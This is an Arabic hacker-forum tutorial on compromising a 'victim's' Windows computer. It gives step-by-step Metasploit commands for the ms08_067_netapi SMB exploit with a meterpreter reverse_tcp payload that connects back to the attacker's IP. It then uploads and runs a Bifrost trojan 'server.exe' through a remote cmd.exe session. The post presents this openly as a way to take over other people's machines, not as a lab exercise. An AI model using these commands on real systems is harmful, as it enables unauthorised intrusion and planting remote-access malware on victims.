تحية لكم ياأعضاء منتديات جيوش الهكرز ،نسأل الله أن تكونوا على خير حال
اليوم راح نشرح بالصور طريقة إختراق جهاز الضحية بإستخدام مشروع الميتا ورفع سيرفر بيفروست على الجهاز
نتابع .....
تم تنفيذ الشرح باستخدام الإصدار التالي metasploit framework gui v3.2-release
نقوم بفتح أداة Metasploit 3 GUI وبعد فتحها نقوم بالضغط علي كلمة window وبعد ذلك علي console
سوف تنفتح لنا نافذة console نقوم بكتابة الأمر التالي فيها لإستعراض الإكسبلويتات :
سوف نقوم بإستخدام إكسبلويت windows/smb/ms08_067_netapi من خلال الأمر التالي :
كود:
use windows/smb/ms08_067_netapi
بعد ذلك نقوم بإستعراض البايلودز من خلال أمر show payloads
ونختار البايلود التالي :
كود:
set payload windows/ meterpreter/reverse_tcp
[center]
بعد تحديد البايلود المستخدم نقوم باستعراض الخيارات بامر show options ونقوم بتعبئة الخيارات وفقا لما يلي :
كود:
set RHOST ip بدل كلمة أي بي نضع أي بي الضحية
set Lhost ip بدل كلمة أي بي نضع أي بي جهازنا
وبعد ذلك نقوم بتطبيق الثغرة بأمر exploit ومن ثم enter
كما نلاحظ فيما يلي تم الإتصال بنجاح مع الجهاز عن طريق port 445
بعد ذلك ولمعرفة الخيارات المتاحة لنا نكتب أمر help ومن خلال الخيارات سنقوم برفع السيرفر ولاكن يجب قبل الرفع أن يتم نقل إلى داخل المجلد التالي :
كود:
C:\Program Files\metasploit\Framework3
وسنقوم برفع السيرفر من خلال الأمر التالي :
كود:
upload -r server.exe c:\
بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية:
كود:
use -m process
execute -f cmd.exe -c
interact 3
حسب رقم channel أو session المفتوح
لتشغيل السيرفر
وكما توضح الصورة نجاح تحميل السيرفر
شاشة الضحية
نسأل الله أن نكون قد وفقنا في تناول وشرح الموضوع ونأسف على أي تقصير
ودمتم سالمين
